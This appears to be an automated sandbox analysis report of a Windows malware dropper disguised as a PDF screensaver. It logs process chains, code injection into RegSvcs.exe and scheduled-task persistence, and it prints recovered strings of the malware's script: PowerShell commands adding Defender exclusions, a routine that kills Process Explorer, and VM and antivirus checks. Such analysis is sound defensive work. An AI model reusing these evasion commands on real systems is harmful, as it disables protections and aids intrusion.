      Source: wscript.exe, 0000001B.00000002.534995230.0000025B9C8D0000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------[
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe#
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo,0_2_00CDE6A3
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CCA69B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CDC220
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEB348 FindFirstFileExA,0_2_00CEB348
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0037E387
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0037D836
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0038A0FA
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_0038A488
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,2_2_003865F1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034C642 FindFirstFileExW,2_2_0034C642
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00387248 FindFirstFileW,FindClose,2_2_00387248
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_003872E9
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0037DB69
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00315D78
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h]0_2_00CE7DEE
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00335078 mov eax, dword ptr fs:[00000030h]2_2_00335078
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDF838
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEC030 GetProcessHeap,0_2_00CEC030
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F3FF BlockInput,2_2_0038F3FF
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF9D5 SetUnhandledExceptionFilter,0_2_00CDF9D5
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDF838
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CDFBCA
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CE8EBD
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330D65 SetUnhandledExceptionFilter,2_2_00330D65
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003429B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003429B2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00330BCF
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00330FB1

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Starts an encoded Visual Basic Script (VBE)
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbeJump to behavior
      Allocates memory in foreign processes
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and writeJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5AJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11EE000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037BB02 SendInput,keybd_event,2_2_0037BB02
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xlsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitems
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displayname
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: next
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" then
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadmin
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endif
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") then
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6ecsz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: c:\windows\syswow64\wscript.exe\??\c:\windows\syswow64\wscript.exe;
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: 63209-405:en-usenwscript<
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: 23456789
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: h:mm:ss tt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: h:mm tt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: m/d/yyyymmmm yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: dddd, mmmm d, yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: @nvny
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @mhv0lhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv bhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv`phv0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: phv thv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mhvnhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ghvpihv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qhv`ahv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv@alv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv@jhv vhvpyhv@hhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hv0xhvpdhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: yhv fhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bhvpghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @hvpmhvpthvpthv`khv0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wpchv ohvpihv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nhvp[hv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rhv`ghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nhvp[hvrhv`ghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vhv`vhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fhvpdhvpphv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vhv`vhvfhvpdhvpphv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hv`rhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ehvpxhv0yhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mvpehv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ehv`ehv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: zhv@nhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ihv uhv f
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: maximum allowed array size (%u) is exceededcmtrrh%uhc%ux%uxc%u;%u
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\aclstmrtmp%d
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: select * from win32_operatingsystem
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: *messages***
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ...root\cimv2select * from win32_operatingsystemwqlnamewindows 10*?.rar.exe.sfx00?*<>|"?*%c:\\\?\uncconprnauxnulcom#lpt#*messages****messages***r!
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptprotectmemory
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptunprotectmemory
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistpos
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlldirectoryw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdefaultdlldirectories
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exception
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad allocation
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitformultipleobjects error %d, getlasterror %d
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: thread pool initialization failed.%ls>%s: %s
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exceptionbad allocation
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: z2fq`
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head></html></p><br><style></style><style>body{font-family:"arial";font-size:12;}</style>&nbsp;
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_browsetitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmdextracting
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_skipping
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unexpeof
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_fileheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_headerbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_mainheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_outofmemoryerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unknownmethod
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotopen
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreate
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotmkdir
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_encrcrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrcrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_packeddatacrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_writeerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_readerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_closeerror
